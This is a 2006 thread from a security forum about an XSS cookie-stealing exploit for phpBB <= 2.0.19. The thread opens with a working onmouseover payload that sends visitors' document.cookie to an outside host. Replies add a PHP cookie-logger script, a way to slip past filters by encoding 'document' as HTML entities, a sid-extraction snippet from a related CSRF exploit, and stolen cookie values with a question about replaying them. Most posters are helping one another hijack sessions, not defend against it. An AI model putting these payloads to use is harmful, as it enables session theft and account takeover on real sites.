Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 48
Members: 0
Total: 48
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
PostPosted: Tue Jan 31, 2006 11:40 pm Reply with quote
syntax9
Active user
Active user
Joined: Dec 21, 2005
Posts: 33




# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

http://www.somesite.com/</pre>

# milw0rm.com [2006-01-29]
View user's profile Send private message
PostPosted: Wed Feb 01, 2006 7:20 pm Reply with quote
cXIb8O3
Active user
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




like in 2018..

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0063
View user's profile Send private message Visit poster's website
PostPosted: Sat Feb 11, 2006 6:08 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




credit to everyone that found this bug


poc
http://kisobox.com/exploits/phpbb.2.0.19.xss+cookies.stealer.txt

brief video tutorial about it.

http://kisobox.com/vtu.php or http://kisobox.com/area52/phpbb2.0.19
more to come.
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 08, 2006 10:09 am Reply with quote
Musaaf
Beginner
Beginner
Joined: Mar 08, 2006
Posts: 3




subzero wrote:
credit to everyone that found this bug


poc
http://kisobox.com/exploits/phpbb.2.0.19.xss+cookies.stealer.txt

brief video tutorial about it.

http://kisobox.com/vtu.php or http://kisobox.com/area52/phpbb2.0.19
more to come.


Just reading this, the exploit for 2.0.19

http://www.kisobox.com/exploits/Remote/phpbb.2.0.19.xss+cookies.stealer.txt

Quote:
POC : xss in bbcode (html enable)

<pre a='>' onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b='<pre' >




cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


How to use it ? and what to do with the cookie.php file
View user's profile Send private message
hola
PostPosted: Tue Mar 14, 2006 7:13 pm Reply with quote
DARKNIGHT
Beginner
Beginner
Joined: Mar 14, 2006
Posts: 1




Well, Thank you for the code, it's nice, but I have a problem.

First, I proved that code in my localhost, my localhost has Nuke ET 3.3 (the nuke et is a version of php-nuke modified => www.truzone.org). HTML is on.

I wrote the code in a post:
<pre a='>' onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b='<pre' >Cualquier texto o codigo</pre>

But maybe the nuke changed the code for this:
onmouseover='doc***nt.location="http://localhost/cookies.php?c="+doc***nt.cookie' b='<pre' >Cualquier texto o codigo</pre>

So, in concret the possible protection is that when you write the word document the nuke et change it for doc***nt.

My question is this: can I use concatenation o something in order to change the word document?.

For example that one variable represent one letter and soon to unite them.
var1="doc " + "u" + "m" + "e" + "nt";

Maybe I'm crazy for saying a theory (aja) very ridiculous.

And finally another question do you have another solution or existing another code in orde to explode this bug?

Well, thank you for your answers and I'm sorry for my english, I don't have practice with my english.
View user's profile Send private message
PostPosted: Tue Mar 14, 2006 9:27 pm Reply with quote
syntax9
Active user
Active user
Joined: Dec 21, 2005
Posts: 33




the code is for phpbb, never tried it with phpnuke.
View user's profile Send private message
Re: hola
PostPosted: Tue Mar 14, 2006 10:22 pm Reply with quote
cXIb8O3
Active user
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




DARKNIGHT wrote:

My question is this: can I use concatenation o something in order to change the word document?.


Try HTML without semicolons... I am not sure.. but i have tested in IE and works..

document=&#100&#111&#99&#117&#109&#101&#110&#116

etc..
View user's profile Send private message Visit poster's website
Re: hola
PostPosted: Tue Mar 14, 2006 10:24 pm Reply with quote
cXIb8O3
Active user
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




DARKNIGHT wrote:

My question is this: can I use concatenation o something in order to change the word document?.


Try HTML without semicolons... I am not sure.. but i have tested in IE and works..

document=&#100&#111&#99&#117&#109&#101&#110&#116

etc..
View user's profile Send private message Visit poster's website
Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
PostPosted: Wed Mar 15, 2006 6:14 pm Reply with quote
greatshape
Beginner
Beginner
Joined: Mar 10, 2006
Posts: 4




syntax9 wrote:
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

http://www.somesite.com/</pre>

# milw0rm.com [2006-01-29]


Just found something worth mentioning.
This isn't working on phpbb 2.0.19 if you send the admin a PM to steal his cookie.
Html is always disabled in his inbox, even when it's enabled on the board.
He will always see the rough html code you typed in his PM

Regards
GreATshaPe
View user's profile Send private message
PostPosted: Wed Mar 15, 2006 8:14 pm Reply with quote
cXIb8O3
Active user
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi
View user's profile Send private message Visit poster's website
PostPosted: Thu Mar 16, 2006 2:40 am Reply with quote
greatshape
Beginner
Beginner
Joined: Mar 10, 2006
Posts: 4




cXIb8O3 wrote:
i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi


Looks nice! I don't get it for 100%, but i'll find out.
For example, in the movie, where does the root login come from all of a sudden?
How does the attacker know this login?
Tnx

PS Is there a way to defend against this as admin?
View user's profile Send private message
PostPosted: Thu Mar 16, 2006 1:49 pm Reply with quote
sami
Beginner
Beginner
Joined: Mar 16, 2006
Posts: 1




In regards to the following exploit....

cXIb8O3 wrote:
i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi



i quote from somewhere else

Quote:

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.


which seems to hold true, will need to get admin SID first.....
View user's profile Send private message
PostPosted: Thu Mar 16, 2006 1:49 pm Reply with quote
sami
Beginner
Beginner
Joined: Mar 16, 2006
Posts: 1




In regards to the following exploit....

cXIb8O3 wrote:
i think, better solusion is CSRF...

adv
http://securityreason.com/achievement_securityalert/31

and simple image exploit
http://securityreason.com/expldownload/10/6


i can public the next few days one movie...

http://cx.bestoption.pl/phpbb2019_csrf.avi



i quote from somewhere else

Quote:

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.


which seems to hold true, will need to get admin SID first.....
View user's profile Send private message
PostPosted: Thu Mar 16, 2006 2:59 pm Reply with quote
cXIb8O3
Active user
Active user
Joined: Feb 17, 2005
Posts: 26
Location: Poland<>Luxembourg




sami wrote:

i quote from somewhere else

Quote:

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.


which seems to hold true, will need to get admin SID first.....


in exploit you have

Code:

$url = parse_url(getenv('HTTP_REFERER'));

preg_match('/(\/.*)\//', $url['path'], $path);
preg_match('#sid\=?([0-9a-z]*)#i', $url['query'], $sid);


if in HTTP_REFFERER is sid... exploit works... admin need see hacker profil with IMG URL to exploit..
View user's profile Send private message Visit poster's website
PostPosted: Sat Mar 18, 2006 6:16 am Reply with quote
Cat
Beginner
Beginner
Joined: Mar 15, 2006
Posts: 4




Hmmm..
Well this obviously works, results:
phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; phpbb2mysql_sid=5a37b34c08b31a776b01faaff43e6d38

However I have come to a dire problem. When it comes to crafting the cookie, it doesn't work right. I used FF to craft --

name: phpbb2mysql_data
data: a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}

etc...

Doesn't work though...I have tried converting the _data (example) one to hex as well.

Any suggestions?
View user's profile Send private message
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.037 Seconds